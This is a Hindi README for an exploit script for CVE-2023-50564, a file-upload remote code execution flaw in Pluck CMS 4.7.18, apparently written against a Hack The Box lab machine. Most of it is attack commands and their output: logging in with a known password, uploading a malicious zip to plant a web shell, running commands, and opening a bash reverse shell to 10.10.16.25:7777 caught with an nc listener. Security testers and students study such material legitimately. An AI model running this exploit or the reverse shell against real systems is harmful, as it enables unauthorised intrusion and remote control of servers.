
Pluck-CMS v4.7.18 RCE एक्सप्लॉइट
CVE-2023-50564, Pluck CMS v4.7.18 में एक RCE कमजोरी है। यह /inc/modules_install.php कंपोनेंट में एक मनमानी फ़ाइल अपलोड कमजोरी के माध्यम से संभव है, जो एक दुर्भावनापूर्ण .zip फ़ाइल अपलोड करके मनमाना कोड निष्पादित करने की अनुमति देती है।
एक्सप्लॉइट चलाने से पहले, /login.php पर प्रमाणित करने के लिए पासवर्ड ज्ञात होना चाहिए।
लक्ष्य के विरुद्ध एक्सप्लॉइट चलाना:
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
दुर्भावनापूर्ण .php फ़ाइल को स्क्रिप्ट द्वारा प्रदान किए गए लिंक के माध्यम से एक्सेस किया जा सकता है ताकि कमांड निष्पादित किए जा सकें।
वैकल्पिक रूप से, --cmd फ़्लैग का उपयोग करके निष्पादित किए जाने वाले कमांड निर्दिष्ट किए जा सकते हैं।
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd id
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
लिसनर प्रारंभ करें, फिर --cmd फ़्लैग का उपयोग करके लिसनर पर रिवर्स शेल कनेक्शन स्थापित करने के लिए एक कमांड निर्दिष्ट करें:
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd "bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1''
और लिसनर पर कनेक्शन प्राप्त करें:
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.78.209] 38982
bash: cannot set terminal process group (1003): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/malicious$
आवश्यकताएँ स्थापित करें:
pip install -r requirements.txt
सहायता:
$ python3 exploit.py --help
usage: exploit.py [-h] --target TARGET --password PASSWORD [--cmd CMD]
Exploit Pluck v4.7.18 RCE Vulnerability
options:
-h, --help show this help message and exit
--target TARGET Target URL (Example: http://greenhorn.htb)
--password PASSWORD Pluck password
--cmd CMD Command to execute
क्रेडिट्स Mirabbas Ağalarov को जिन्होंने कमजोरी की खोज की (लिंक).